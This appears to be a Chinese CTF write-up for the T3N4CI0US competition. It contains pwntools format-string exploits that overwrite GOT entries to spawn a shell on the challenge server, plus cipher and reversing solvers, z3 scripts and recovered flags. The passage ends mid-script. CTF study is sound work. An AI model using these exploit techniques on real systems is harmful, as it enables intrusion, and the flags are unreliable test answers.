好多都作不出来,老外的思路就是不一样。看看有谁有结果
pwnable
CheckCheckCheck
- 题目
V3Y4GK0FW{EccrEsXpvtjIcdc} 后来改为 V3Y4GK0FW{EccrEs_Xpvtj_Icdc} 思路,显然题目的flag壳是T3N4CI0US,这里是+2,+11,+4的循环,不过提交总是不正确,后来他把题目加了下划线。不过这题跟frech是一样的,也不是pwn题
c = 'VYGKFWEccrEsXpvtjIcdc' a = c.upper() out = '' for i in range(0, len(a), 3): out += chr(((ord(a[i]) - ord('A') -2 )%26) + ord('A')) out += chr(((ord(a[i+1]) - ord('A') -11 )%26) + ord('A')) out += chr(((ord(a[i+2]) - ord('A') -4 )%26) + ord('A')) print(c) print(out) b = '' for i in range(len(a)): if c[i].isupper(): b += out[i] else: b += out[i].lower() print(b) #T3N4CI0US{CrypToVerryEasy} #T3N4CI0US{CrypTo_Verry_Easy}
- 题目
prison
- 题目原码
int __cdecl main(int argc, const char **argv, const char **envp) { char s[10]; // [rsp+6h] [rbp-Ah] BYREF puts("It's up to you when you come in, but not when you go out"); gets(s, argv); puts(s); return 0; }显然这是个溢出的题,正常情况下先溢出后写pop_rdi,got_puts,plt_puts,_start取得libc再来一次pop_rdi,bin_sh,system就行了。可这里有个问题,输入后是没有反应的,为得到反应作了无数次尝试,最后发现后边需要两个回车\n\n或者很近的两个回车\nabcd\n而当第二次循环就直接over了,后来题目显示有问题
- 题目原码
Patchcode
- 其实这里没有题目,nc过去以后是相shell可以直接cat home/ctf/flag,提交也显示正确并不能再提交。但不显示分数
noooooob
- 这是个ret2system的题有printf漏洞和system函数,got表没有保护,PIE没开
int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[264]; // [rsp+0h] [rbp-110h] BYREF unsigned __int64 v4; // [rsp+108h] [rbp-8h] v4 = __readfsqword(0x28u); read(0, buf, 0x100uLL); printf(buf); exit(0); }解法也简单,直接把got['exit']的值改为shell
from pwn import * #p = process('./prob') p = remote('34.64.203.138', 10002) elf = ELF('./prob') context(arch='amd64', log_level='debug') #gdb.attach(p, "b*0x400630") #pause() payload = b"%64c%10$hn%1415c%9$hnxxx"+p64(elf.got['exit'])+ p64(elf.got['exit']+2) #payload = fmtstr_payload(7, {elf.got['exit'] : elf.sym['system']+4}) p.sendline( payload ) #p.recvuntil(b'xx') sleep(1) p.interactive()
- 这是个ret2system的题有printf漏洞和system函数,got表没有保护,PIE没开
Trigger Master
- 这个跟上题一样,只是没有了system函数
int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[264]; // [rsp+0h] [rbp-110h] BYREF unsigned __int64 v4; // [rsp+108h] [rbp-8h] v4 = __readfsqword(0x28u); read(0, buf, 0x100uLL); printf(buf); exit(0); }思路是先把got_exit的值改为main同时漏洞一got[printf]的值,然后再把printf改为system并发个/bin/sh但问题与上边一样没有输出,需要大输入才能挤出一部分来,也没有实现,后来几乎所有的pwn题都报后台有问题就算了
from pwn import * def conn(local=1): global p,libc_elf,one if local == 1: p = process('./prob') libc_elf = ELF('/home/shi/libc6_2.31-0ubuntu9.9/lib/x86_64-linux-gnu/libc.so.6') one = [0xe3afe, 0xe3b01, 0xe3b04] else: p = remote('34.64.203.138', 10003) libc_elf = ELF('/home/shi/libc6_2.31-0ubuntu9.9/lib/x86_64-linux-gnu/libc.so.6') one = [0xe3afe, 0xe3b01, 0xe3b04] def write(where, what): print(hex(where), hex(what)) v0 = 8 off = 16 payload = '/bin/sh;' for i in range(8): v1 =what&0xff what >>=8 v2 = (v1-v0)%0x100 v0 = v1 if v2 == 0: payload += "%"+ str(off+i)+"$hhn" else: payload += "%"+ str(v2) + "c%"+ str(off+i)+"$hhn" if what == 0: break payload = (payload+ '%4000c').ljust(0x50, 'A').encode() for i in range(8): payload += p64(where+i) #payload = payload.ljust(0x100, b'A') p.sendline(payload+ b'XXXX') elf = ELF('./prob') context(arch='amd64', log_level='debug') #0x400577 conn(0) p.settimeout(5.0) #gdb.attach(p, 'b*0x4005c8') #pause() off = 6 + (0x7a8-0x5f0)//8 #sleep(2) #payload = b"%5c%11$hhn%114c%10$hhn%12$s,".ljust(0x20,b'A')+flat(elf.got['exit'],elf.got['exit']+1, elf.got['printf']) #p.sendline( payload) write(elf.got['exit'], elf.sym['main']) #sleep(2) sleep(5) p.recvuntil(b'XXXX') p.sendline((b'%8$s%5000c'.ljust(16, b'A')+p64(elf.got['printf']))) sleep(5) libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc_elf.sym['printf'] libc_elf.address = libc_base print('libc:',hex(libc_base)) system = libc_elf.sym['system'] write(elf.got['printf'], libc_base + one[2]) sleep(5) p.recv() p.sendline(b'/bin/sh\x00') p.interactive()
- 这个跟上题一样,只是没有了system函数
MISC
find me
- misc题一个都没作出来,没有附后件,只有提示,感觉像脑筋急转弯
hello pls find Dolpari flag format : T3N4CI0US{Site URL}
- misc题一个都没作出来,没有附后件,只有提示,感觉像脑筋急转弯
Find us
Hi, can you find us? Go into a site somewhere and look for us!
Basic Number
I'm going to code the file I gave you, and I'm going to code the number seven Enter the code with the print as flag format : T3N4CI0US{print????????}
Hard Number
Complete this code so that the number 7 comes out Then insert the last line of the code into the flag #这个有附件是ipyb的看不懂
re They
- 有一堆图,提示是
About them!
- 有一堆图,提示是
Crypto
french
- 跟pwn那是一个题
French Ciper V3Y4GK0FW{EccrEs_Xpvtj_Icdc}
- 跟pwn那是一个题
Before Porta arrives at the port!
- 摩尔斯码,key应该是给上一题的,French Cipher应该就是维吉尼亚密码,上题用这个key就能解
Before Porta arrives at the port! Decryption is required to interpret this.. ...-- -. ....- -.-. .. ----- ..- ... # --- .--- .- -.. .-.. -.. ..--.- ..- ..--.- .--. -.-- .--. ..--.- ...- ..--.- . ..-. --. --.. -..- --.. -..- # key = cle解出来不对
T3N4CI0US{OJADLD_U_PYP_V_EFGZXZX} T3N4CI0US{MYWBAZ_S_EUN_K_ADVVVOT}
- 摩尔斯码,key应该是给上一题的,French Cipher应该就是维吉尼亚密码,上题用这个key就能解
ed
What is this? HcBBCkAREAbgq/xuoFjZWtnY4AAyQ0oplnp3n3pfX3VgXjhkE60PuqRH3DbxUb9PAA==
re
Find the alphabet and number to fit in (). ╭──────────╮ I H M () L A T P ╰──────────╯ I = 7 H = 6 M = 7 () = () L = 15 A = 15 T = 38 P = 16 T3N4CI0US{Alphabet_Number}
ro
[ W E = 360 ] [ S N S = 360 ] [ N E W S = ? ]这个题的EWSN表示东西南北,从北开始顺时针方向的角度,NEWS=0+90+270+180 = 540
Shuuuung
Can you find this password and escape? Find the password that means these. JEW LEE ETT, CHAR LEE, PAH PAH Replace spaces with _
one
26s + 8t = 2( == gcd(26,8)) + 12345 for the correct answer
Reversing
Warmup
- 这个程序肯定是看不懂的,非常非常复杂,但原码里有flag
T3N4CI0US{773a_6d8c_c01fbc_f454646564_2_049eb4_3c2ad_852}
- 这个程序肯定是看不懂的,非常非常复杂,但原码里有flag
Rooftop
- 先md5再逆序再hex,看似简单,但md5这块逆不了
int __cdecl main(int argc, const char **argv, const char **envp) { char s2[8]; // [rsp+10h] [rbp-30h] BYREF __int64 v5; // [rsp+18h] [rbp-28h] __int64 v6; // [rsp+20h] [rbp-20h] __int64 v7; // [rsp+28h] [rbp-18h] char v8; // [rsp+30h] [rbp-10h] if ( argc > 1 ) { *(_QWORD *)s2 = 0LL; v5 = 0LL; v6 = 0LL; v7 = 0LL; v8 = 0; emmdee5(argv[1], (__int64)s2); printf("%s", s2); if ( !strcmp("55347092ad1b19f9021174038078e57a", s2) ) printf("Flag: T3N4CI0US{%s}\n", argv[1]); else puts("Sorry.."); return 0; } else { printf("Flag: %s <password>\n", *argv); return 1; } } int __fastcall emmdee5(const char *a1, __int64 a2) { __int64 v2; // rax int result; // eax __int64 v4[3]; // [rsp+10h] [rbp-20h] BYREF int i; // [rsp+2Ch] [rbp-4h] v4[0] = 0LL; v4[1] = 0LL; v2 = strlen(a1); MD5((__int64)a1, v2, (__int64)v4); result = esrever((const char *)v4); // 逆序 for ( i = 0; i <= 15; ++i ) result = sprintf((char *)(a2 + 2 * i), "%02x", *((unsigned __int8 *)v4 + i)); return result; }
- 先md5再逆序再hex,看似简单,但md5这块逆不了
WHISEN
- 把flag的字符重新排了个序
int __cdecl main(int argc, const char **argv, const char **envp) { char s1[40]; // [rsp+0h] [rbp-50h] BYREF char *s2; // [rsp+28h] [rbp-28h] char v6[26]; // [rsp+36h] [rbp-1Ah] BYREF qmemcpy(v6, "}40_0hIfUrC{S_4rrc0NT03k3T", sizeof(v6)); s2 = (char *)malloc(0x1AuLL); printf("Enter the Password : "); __isoc99_scanf("%s", s2); s1[0] = v6[25]; s1[1] = v6[22]; s1[2] = v6[19]; s1[3] = v6[14]; s1[4] = v6[10]; s1[5] = v6[6]; s1[6] = v6[4]; s1[7] = v6[8]; s1[8] = v6[12]; s1[9] = v6[11]; s1[10] = v6[16]; s1[11] = v6[18]; s1[12] = v6[21]; s1[13] = v6[20]; s1[14] = v6[3]; s1[15] = v6[7]; s1[16] = v6[2]; s1[17] = v6[15]; s1[18] = v6[13]; s1[19] = v6[5]; s1[20] = v6[14]; s1[21] = v6[17]; s1[22] = v6[23]; s1[23] = v6[24]; s1[24] = v6[9]; if ( !strncmp(s1, s2, 0x1AuLL) ) printf("Success! You found the flag!\n%s\n", s1); else puts("Incorrect Password !"); return 0; }结果这个提交正确了
v6 = "}40_0hIfUrC{S_4rrc0NT03k3T" s1 = [0]*25 s1[0] = v6[25] s1[1] = v6[22] s1[2] = v6[19] s1[3] = v6[14] s1[4] = v6[10] s1[5] = v6[6] s1[6] = v6[4] s1[7] = v6[8] s1[8] = v6[12] s1[9] = v6[11] s1[10] = v6[16] s1[11] = v6[18] s1[12] = v6[21] s1[13] = v6[20] s1[14] = v6[3] s1[15] = v6[7] s1[16] = v6[2] s1[17] = v6[15] s1[18] = v6[13] s1[19] = v6[5] s1[20] = v6[14] s1[21] = v6[17] s1[22] = v6[23] s1[23] = v6[24] s1[24] = v6[9] print(s1) print(''.join(s1)) #T3N4CI0US{r00T_f0r_h4ck3r}
- 把flag的字符重新排了个序
TLS
- 我感觉这是唯一有点难度的题32位,UPX壳,z3一把梭,但提交不正确不知道哪错了
fgets(Buffer, 256, Stream); v6 = ftell(Stream); fclose(Stream); if ( v6 == 19 ) { v8[0] = (Buffer[11] * Buffer[11] - Buffer[11]) ^ (Buffer[0] + Buffer[18] * Buffer[12] * Buffer[17] + Buffer[5] + Buffer[0] * Buffer[16] - Buffer[14] * Buffer[1]) ^ 0x59; v8[1] = (Buffer[1] + Buffer[7] * Buffer[0] - Buffer[18] * Buffer[0] - Buffer[5]) ^ (Buffer[12] + Buffer[4] * Buffer[2]) ^ (Buffer[1] - Buffer[10] * Buffer[3]) ^ 0x7B; v8[2] = Buffer[11] ^ Buffer[8] ^ (Buffer[1] * Buffer[15] + Buffer[3] * Buffer[17] - Buffer[14] - Buffer[5] - Buffer[1] - Buffer[6]) ^ Buffer[3] ^ 0xC0; v8[3] = Buffer[9] ^ Buffer[5] ^ (Buffer[8] + Buffer[3] + Buffer[4] + Buffer[18] - Buffer[4] * Buffer[6]) ^ Buffer[15] ^ 0xAD; v8[4] = Buffer[12] ^ (Buffer[18] * Buffer[18] * Buffer[4] - Buffer[7] - Buffer[3]) ^ (Buffer[3] - Buffer[17] - Buffer[1]) ^ (Buffer[5] + Buffer[7] * Buffer[18]) ^ 0x55; v8[5] = (Buffer[10] + Buffer[3] * Buffer[14] - Buffer[15]) ^ (Buffer[8] + Buffer[14] - Buffer[11]) ^ Buffer[3] ^ 0x9C; v8[6] = Buffer[6] ^ Buffer[3] ^ Buffer[9] ^ (Buffer[2] * Buffer[5] * Buffer[17] + Buffer[11] + Buffer[17] - Buffer[15] - Buffer[5] - Buffer[7]) ^ 0x12; v8[7] = (Buffer[8] * Buffer[9] * Buffer[17]) ^ (Buffer[5] * Buffer[2] * Buffer[16] - Buffer[5] - Buffer[7]) ^ Buffer[16] ^ 0x34; v8[8] = Buffer[4] ^ Buffer[7] ^ Buffer[6] ^ (Buffer[16] * Buffer[4] - Buffer[7] * Buffer[15]) ^ (Buffer[1] * Buffer[10] * Buffer[1] * Buffer[17]) ^ Buffer[10] ^ 0x53; v8[9] = (Buffer[12] * Buffer[3]) ^ (Buffer[5] * Buffer[9] + Buffer[13] + Buffer[2] + Buffer[15] * Buffer[9] - Buffer[1] - Buffer[14] * Buffer[3]) ^ 0x50; v8[10] = (Buffer[5] * Buffer[7]) ^ Buffer[11] ^ (Buffer[12] - Buffer[15]) ^ (Buffer[0] + Buffer[9]) ^ (Buffer[7] - Buffer[1] * Buffer[3]) ^ 0x13; v8[11] = (Buffer[10] + Buffer[2] * Buffer[17]) ^ (Buffer[16] + Buffer[15] * Buffer[6] + Buffer[11] + Buffer[9] - Buffer[4]) ^ Buffer[5] ^ 0x62; v8[12] = (Buffer[6] + Buffer[7] - Buffer[5] - Buffer[9] - Buffer[5] * Buffer[12]) ^ Buffer[16] ^ (Buffer[8] * Buffer[14]) ^ 0x9B; v8[13] = Buffer[0] ^ (Buffer[16] + Buffer[9] + Buffer[5] * Buffer[17] - Buffer[0]) ^ (Buffer[18] + Buffer[6] + Buffer[16]) ^ 0x85; v8[14] = Buffer[3] ^ (Buffer[11] + Buffer[6]) ^ (Buffer[2] * Buffer[14] * Buffer[0]) ^ Buffer[7] ^ (Buffer[15] - Buffer[2]) ^ 0x73; v8[15] = (Buffer[2] * Buffer[18] + Buffer[10]) ^ (Buffer[5] + Buffer[14] * Buffer[16] - Buffer[8] - Buffer[6] - Buffer[17]) ^ (Buffer[0] * Buffer[7] + Buffer[9]) ^ 0x3D; v8[16] = (Buffer[14] + Buffer[7] - Buffer[8] - Buffer[6] - Buffer[8]) ^ Buffer[2] ^ Buffer[16] ^ 0xD0; v8[17] = (Buffer[0] * Buffer[17] * Buffer[3] * Buffer[2]) ^ (Buffer[13] - Buffer[8] - Buffer[10] * Buffer[5]) ^ (Buffer[12] + Buffer[0]) ^ (Buffer[11] + Buffer[10]) ^ 0xF2; v8[18] = (Buffer[5] * Buffer[15] * Buffer[8] + Buffer[7] * Buffer[8] + Buffer[15] - Buffer[1] - Buffer[12]) ^ 0x92; v8[19] = (Buffer[6] * Buffer[0]) ^ (Buffer[12] * Buffer[14] + Buffer[11] + Buffer[1] - Buffer[9] * Buffer[16] - Buffer[18] - Buffer[9]) ^ 0x43; v8[20] = (Buffer[0] + Buffer[11]) ^ (Buffer[17] + Buffer[8] * Buffer[3] - Buffer[7]) ^ (Buffer[7] + Buffer[7] * Buffer[16] + Buffer[0] - Buffer[10]) ^ 0x18; v8[21] = Buffer[9] ^ (Buffer[9] + Buffer[8] * Buffer[9] - Buffer[17]) ^ (Buffer[2] * Buffer[4] * Buffer[1] * Buffer[15] * Buffer[17] * Buffer[5]) ^ 0x26; v8[22] = Buffer[8] ^ (Buffer[5] * Buffer[15] - Buffer[11] * Buffer[17] * Buffer[2]) ^ Buffer[18] ^ 0x9B; v8[23] = (Buffer[1] * Buffer[17] * Buffer[4]) ^ (Buffer[5] + Buffer[11] * Buffer[11]) ^ (Buffer[2] - Buffer[7]) ^ (Buffer[14] * Buffer[9]) ^ Buffer[11] ^ 0x38; v8[24] = (Buffer[4] * Buffer[11] * Buffer[12] - Buffer[1]) ^ (Buffer[14] * Buffer[5]) ^ Buffer[14] ^ Buffer[12] ^ 0x7F; v8[25] = Buffer[10] ^ (Buffer[10] - Buffer[16]) ^ (Buffer[9] * Buffer[15]) ^ 0x40; v8[26] = (Buffer[12] * Buffer[8]) ^ (Buffer[13] * Buffer[13]) ^ (Buffer[2] * Buffer[1] - Buffer[11]) ^ (Buffer[3] + Buffer[10]) ^ 0x12; v8[27] = (Buffer[6] * Buffer[14]) ^ Buffer[17] ^ (Buffer[18] * Buffer[2] + Buffer[4]) ^ 0x7E; v8[28] = (Buffer[10] + Buffer[16]) ^ (Buffer[8] * Buffer[11] + Buffer[15]) ^ Buffer[13] ^ (Buffer[4] * Buffer[15] - Buffer[8]) ^ 0x7F; v8[29] = (Buffer[1] + Buffer[10]) ^ (Buffer[6] + Buffer[6] + Buffer[4] + Buffer[0] + Buffer[12] + Buffer[7] * Buffer[5] - Buffer[2]) ^ 0xDF; v8[30] = (Buffer[9] * Buffer[0] * Buffer[5] * Buffer[1] - Buffer[1]) ^ Buffer[14] ^ (Buffer[9] + Buffer[6] - Buffer[4]) ^ 0xF4; v8[31] = (Buffer[5] * Buffer[0] * Buffer[4] + Buffer[7]) ^ (Buffer[5] * Buffer[6] * Buffer[7]) ^ Buffer[11] ^ Buffer[9] ^ 0x53; v8[32] = (Buffer[12] - Buffer[9]) ^ (Buffer[10] - Buffer[1]) ^ Buffer[2] ^ 0x50; v8[33] = (Buffer[8] - Buffer[10]) ^ (Buffer[7] + Buffer[3] - Buffer[0]) ^ (Buffer[13] * Buffer[0] * Buffer[18] - Buffer[15]) ^ 0xE3; v8[34] = (Buffer[3] + Buffer[1] - Buffer[15] - Buffer[2] - Buffer[0]) ^ (Buffer[5] - Buffer[4]) ^ Buffer[10] ^ 0xCF; v8[35] = (Buffer[10] * Buffer[8] * Buffer[6] * Buffer[11] * Buffer[11] * Buffer[1]) ^ (Buffer[13] * Buffer[18] + Buffer[5]) ^ 0x98; Text[0] = v8[rand() % 2]; Text[2] = v8[rand() % 2 + 4]; Text[3] = v8[rand() % 2 + 6]; LOBYTE(v15) = v8[rand() % 2 + 16]; BYTE1(v14) = v8[11 - rand() % 2]; HIBYTE(v14) = v8[rand() % 2 + 14]; LOBYTE(v14) = v8[rand() % 2 + 8]; BYTE2(v14) = v8[13 - rand() % 2]; Text[1] = v8[3 - rand() % 2]; HIBYTE(v15) = 0; Caption[0] = v8[rand() % 2 + 18]; Caption[1] = v8[rand() % 2 + 20]; Caption[2] = v8[rand() % 2 + 22]; Caption[3] = v8[rand() % 2 + 24]; LOBYTE(v11) = v8[rand() % 2 + 26]; BYTE1(v11) = v8[rand() % 2 + 28]; BYTE2(v11) = 79; HIBYTE(v11) = v8[rand() % 2 + 32]; v12 = (unsigned __int8)v8[rand() % 2 + 34]; MessageBoxA(0, Text, Caption, 0);提交不正确的程序
Caption = b'T3N4CI0US' Text = b'CoNGRAtS!' from z3 import * Buffer = [BitVec(f'Buffer_{i}',8) for i in range(19)] v8 = [0]*36 v8[0] = (Buffer[11] * Buffer[11] - Buffer[11]) ^ (Buffer[0] + Buffer[18] * Buffer[12] * Buffer[17] + Buffer[5] + Buffer[0] * Buffer[16] - Buffer[14] * Buffer[1]) ^ 0x59; v8[1] = (Buffer[1] + Buffer[7] * Buffer[0] - Buffer[18] * Buffer[0] - Buffer[5]) ^ (Buffer[12] + Buffer[4] * Buffer[2]) ^ (Buffer[1] - Buffer[10] * Buffer[3]) ^ 0x7B; v8[2] = Buffer[11] ^ Buffer[8] ^ (Buffer[1] * Buffer[15] + Buffer[3] * Buffer[17] - Buffer[14] - Buffer[5] - Buffer[1] - Buffer[6]) ^ Buffer[3] ^ 0xC0; v8[3] = Buffer[9] ^ Buffer[5] ^ (Buffer[8] + Buffer[3] + Buffer[4] + Buffer[18] - Buffer[4] * Buffer[6]) ^ Buffer[15] ^ 0xAD; v8[4] = Buffer[12] ^ (Buffer[18] * Buffer[18] * Buffer[4] - Buffer[7] - Buffer[3]) ^ (Buffer[3] - Buffer[17] - Buffer[1]) ^ (Buffer[5] + Buffer[7] * Buffer[18]) ^ 0x55; v8[5] = (Buffer[10] + Buffer[3] * Buffer[14] - Buffer[15]) ^ (Buffer[8] + Buffer[14] - Buffer[11]) ^ Buffer[3] ^ 0x9C; v8[6] = Buffer[6] ^ Buffer[3] ^ Buffer[9] ^ (Buffer[2] * Buffer[5] * Buffer[17] + Buffer[11] + Buffer[17] - Buffer[15] - Buffer[5] - Buffer[7]) ^ 0x12; v8[7] = (Buffer[8] * Buffer[9] * Buffer[17]) ^ (Buffer[5] * Buffer[2] * Buffer[16] - Buffer[5] - Buffer[7]) ^ Buffer[16] ^ 0x34; v8[8] = Buffer[4] ^ Buffer[7] ^ Buffer[6] ^ (Buffer[16] * Buffer[4] - Buffer[7] * Buffer[15]) ^ (Buffer[1] * Buffer[10] * Buffer[1] * Buffer[17]) ^ Buffer[10] ^ 0x53; v8[9] = (Buffer[12] * Buffer[3]) ^ (Buffer[5] * Buffer[9] + Buffer[13] + Buffer[2] + Buffer[15] * Buffer[9] - Buffer[1] - Buffer[14] * Buffer[3]) ^ 0x50; v8[10] = (Buffer[5] * Buffer[7]) ^ Buffer[11] ^ (Buffer[12] - Buffer[15]) ^ (Buffer[0] + Buffer[9]) ^ (Buffer[7] - Buffer[1] * Buffer[3]) ^ 0x13; v8[11] = (Buffer[10] + Buffer[2] * Buffer[17]) ^ (Buffer[16] + Buffer[15] * Buffer[6] + Buffer[11] + Buffer[9] - Buffer[4]) ^ Buffer[5] ^ 0x62; v8[12] = (Buffer[6] + Buffer[7] - Buffer[5] - Buffer[9] - Buffer[5] * Buffer[12]) ^ Buffer[16] ^ (Buffer[8] * Buffer[14]) ^ 0x9B; v8[13] = Buffer[0] ^ (Buffer[16] + Buffer[9] + Buffer[5] * Buffer[17] - Buffer[0]) ^ (Buffer[18] + Buffer[6] + Buffer[16]) ^ 0x85; v8[14] = Buffer[3] ^ (Buffer[11] + Buffer[6]) ^ (Buffer[2] * Buffer[14] * Buffer[0]) ^ Buffer[7] ^ (Buffer[15] - Buffer[2]) ^ 0x73; v8[15] = (Buffer[2] * Buffer[18] + Buffer[10]) ^ (Buffer[5] + Buffer[14] * Buffer[16] - Buffer[8] - Buffer[6] - Buffer[17]) ^ (Buffer[0] * Buffer[7] + Buffer[9]) ^ 0x3D; v8[16] = (Buffer[14] + Buffer[7] - Buffer[8] - Buffer[6] - Buffer[8]) ^ Buffer[2] ^ Buffer[16] ^ 0xD0; v8[17] = (Buffer[0] * Buffer[17] * Buffer[3] * Buffer[2]) ^ (Buffer[13] - Buffer[8] - Buffer[10] * Buffer[5]) ^ (Buffer[12] + Buffer[0]) ^ (Buffer[11] + Buffer[10]) ^ 0xF2; v8[18] = (Buffer[5] * Buffer[15] * Buffer[8] + Buffer[7] * Buffer[8] + Buffer[15] - Buffer[1] - Buffer[12]) ^ 0x92; v8[19] = (Buffer[6] * Buffer[0]) ^ (Buffer[12] * Buffer[14] + Buffer[11] + Buffer[1] - Buffer[9] * Buffer[16] - Buffer[18] - Buffer[9]) ^ 0x43; v8[20] = (Buffer[0] + Buffer[11]) ^ (Buffer[17] + Buffer[8] * Buffer[3] - Buffer[7]) ^ (Buffer[7] + Buffer[7] * Buffer[16] + Buffer[0] - Buffer[10]) ^ 0x18; v8[21] = Buffer[9] ^ (Buffer[9] + Buffer[8] * Buffer[9] - Buffer[17]) ^ (Buffer[2] * Buffer[4] * Buffer[1] * Buffer[15] * Buffer[17] * Buffer[5]) ^ 0x26; v8[22] = Buffer[8] ^ (Buffer[5] * Buffer[15] - Buffer[11] * Buffer[17] * Buffer[2]) ^ Buffer[18] ^ 0x9B; v8[23] = (Buffer[1] * Buffer[17] * Buffer[4]) ^ (Buffer[5] + Buffer[11] * Buffer[11]) ^ (Buffer[2] - Buffer[7]) ^ (Buffer[14] * Buffer[9]) ^ Buffer[11] ^ 0x38; v8[24] = (Buffer[4] * Buffer[11] * Buffer[12] - Buffer[1]) ^ (Buffer[14] * Buffer[5]) ^ Buffer[14] ^ Buffer[12] ^ 0x7F; v8[25] = Buffer[10] ^ (Buffer[10] - Buffer[16]) ^ (Buffer[9] * Buffer[15]) ^ 0x40; v8[26] = (Buffer[12] * Buffer[8]) ^ (Buffer[13] * Buffer[13]) ^ (Buffer[2] * Buffer[1] - Buffer[11]) ^ (Buffer[3] + Buffer[10]) ^ 0x12; v8[27] = (Buffer[6] * Buffer[14]) ^ Buffer[17] ^ (Buffer[18] * Buffer[2] + Buffer[4]) ^ 0x7E; v8[28] = (Buffer[10] + Buffer[16]) ^ (Buffer[8] * Buffer[11] + Buffer[15]) ^ Buffer[13] ^ (Buffer[4] * Buffer[15] - Buffer[8]) ^ 0x7F; v8[29] = (Buffer[1] + Buffer[10]) ^ (Buffer[6] + Buffer[6] + Buffer[4] + Buffer[0] + Buffer[12] + Buffer[7] * Buffer[5] - Buffer[2]) ^ 0xDF; v8[30] = (Buffer[9] * Buffer[0] * Buffer[5] * Buffer[1] - Buffer[1]) ^ Buffer[14] ^ (Buffer[9] + Buffer[6] - Buffer[4]) ^ 0xF4; v8[31] = (Buffer[5] * Buffer[0] * Buffer[4] + Buffer[7]) ^ (Buffer[5] * Buffer[6] * Buffer[7]) ^ Buffer[11] ^ Buffer[9] ^ 0x53; v8[32] = (Buffer[12] - Buffer[9]) ^ (Buffer[10] - Buffer[1]) ^ Buffer[2] ^ 0x50; v8[33] = (Buffer[8] - Buffer[10]) ^ (Buffer[7] + Buffer[3] - Buffer[0]) ^ (Buffer[13] * Buffer[0] * Buffer[18] - Buffer[15]) ^ 0xE3; v8[34] = (Buffer[3] + Buffer[1] - Buffer[15] - Buffer[2] - Buffer[0]) ^ (Buffer[5] - Buffer[4]) ^ Buffer[10] ^ 0xCF; v8[35] = (Buffer[10] * Buffer[8] * Buffer[6] * Buffer[11] * Buffer[11] * Buffer[1]) ^ (Buffer[13] * Buffer[18] + Buffer[5]) ^ 0x98; s = Solver() for i in range(19): s.add(Buffer[i]>=0x20) ''' Text[0] = v8[rand() % 2]; Text[2] = v8[rand() % 2 + 4]; Text[3] = v8[rand() % 2 + 6]; LOBYTE(v15) = v8[rand() % 2 + 16]; BYTE1(v14) = v8[11 - rand() % 2]; HIBYTE(v14) = v8[rand() % 2 + 14]; LOBYTE(v14) = v8[rand() % 2 + 8]; BYTE2(v14) = v8[13 - rand() % 2]; Text[1] = v8[3 - rand() % 2]; HIBYTE(v15) = 0; ''' # r = '10111100110101100000101100011110001110101111010010' s.add(v8[0 + int(r[0])] == Text[0]) s.add(v8[4 + int(r[1])] == Text[2]) s.add(v8[6 + int(r[2])] == Text[3]) s.add(v8[16 + int(r[3])] == Text[8]) s.add(v8[11 - int(r[4])] == Text[5]) s.add(v8[14 + int(r[5])] == Text[7]) s.add(v8[8 + int(r[6])] == Text[4]) s.add(v8[12 + int(r[7])] == Text[6]) s.add(v8[2 + int(r[8])] == Text[1]) ''' Caption[0] = v8[rand() % 2 + 18]; Caption[1] = v8[rand() % 2 + 20]; Caption[2] = v8[rand() % 2 + 22]; Caption[3] = v8[rand() % 2 + 24]; LOBYTE(v11) = v8[rand() % 2 + 26]; BYTE1(v11) = v8[rand() % 2 + 28]; BYTE2(v11) = 79; HIBYTE(v11) = v8[rand() % 2 + 32]; v12 = (unsigned __int8)v8[rand() % 2 + 34]; ''' s.add(v8[18 + int(r[9])] == Caption[0]) s.add(v8[20 + int(r[10])] == Caption[1]) s.add(v8[22 + int(r[11])] == Caption[2]) s.add(v8[24 + int(r[12])] == Caption[3]) s.add(v8[26 + int(r[13])] == Caption[4]) s.add(v8[28 + int(r[14])] == Caption[5]) s.add(v8[32 + int(r[15])] == Caption[7]) s.add(v8[34 + int(r[16])] == Caption[8]) s.check() d = s.model() for i in range(19): print(chr(d[Buffer[i]].as_long()), end='') #i7's_zer0_n0t_B19_O #T3N4CI0US{i7's_zer0_n0t_B19_O}题目提示
Make the MessageBox print 'CoNGRAtS!' in text and 'T3N4CI0US' in caption! Example: MessageBox.jpg (with file data, no program patches are allowed) flag format is T3N4CI0US{FileData}正确的程序,看了WP,终于发现不对的地方:一是题目用的TLS虽然从程序上看它并没有运行到,但题目应该是提示用TLS里的部分。二是srand(time(0))这里返回的是当前时间而不是0,所以如果时间是随机的话就每个字符的三个条件应该是相同的,所以不用关心哪个成立哪个不成立,应该都是成立的,可问题就在于如果仅一个条件成立的话会有很多解。稍加改动后终于出正确结果。
Caption = b'T3N4CI0US' Text = b'CoNGRAtS!' from z3 import * Buffer = [BitVec(f'Buffer_{i}',8) for i in range(29)] v8 = [0]*54 v8[0] = Buffer[8] ^ (Buffer[12] + Buffer[18] + Buffer[11] + Buffer[12] - Buffer[3] * Buffer[20] - Buffer[24]) ^ 0x37 v8[1] = Buffer[3] ^ (Buffer[17] - Buffer[26]) ^ (Buffer[6] * Buffer[14]) ^ (Buffer[15] + Buffer[13] - Buffer[14]- Buffer[6] - Buffer[20]) ^ 0xC3 v8[2] = (Buffer[5] + Buffer[23] + Buffer[16]) ^ (Buffer[10] * Buffer[8] * Buffer[25] * Buffer[1] * Buffer[18] + Buffer[18]) ^ 0x10 v8[3] = (Buffer[18] * Buffer[13] - Buffer[9]) ^ (Buffer[12] * Buffer[10] + Buffer[14] * Buffer[25] * Buffer[16] - Buffer[12]) ^ Buffer[20] ^ 0x36 v8[4] = (Buffer[24] * Buffer[1] * Buffer[15] - Buffer[3] * Buffer[4]) ^ (Buffer[0] - Buffer[14]) ^ (Buffer[27] + Buffer[7] * Buffer[12]) ^ 0x7D v8[5] = (Buffer[9] * Buffer[28] * Buffer[7]) ^ Buffer[11] ^ (Buffer[24] * Buffer[5]) ^ (Buffer[13] + Buffer[9]) ^ (Buffer[14] * Buffer[25] - Buffer[24]) ^ 0x4E v8[6] = (Buffer[20] - Buffer[8] * Buffer[23] - Buffer[4] * Buffer[26] * Buffer[25]) ^ (Buffer[11] + Buffer[8]) ^ 0x8F v8[7] = Buffer[3] ^ (Buffer[0] + Buffer[11] + Buffer[8] - Buffer[24] - Buffer[7] - Buffer[23] * Buffer[2] - Buffer[1] - Buffer[1]) ^ (Buffer[23] * Buffer[8]) ^ 0xF7 v8[8] = (Buffer[3] - Buffer[9] - Buffer[2]) ^ (Buffer[27] - Buffer[26] - Buffer[16] * 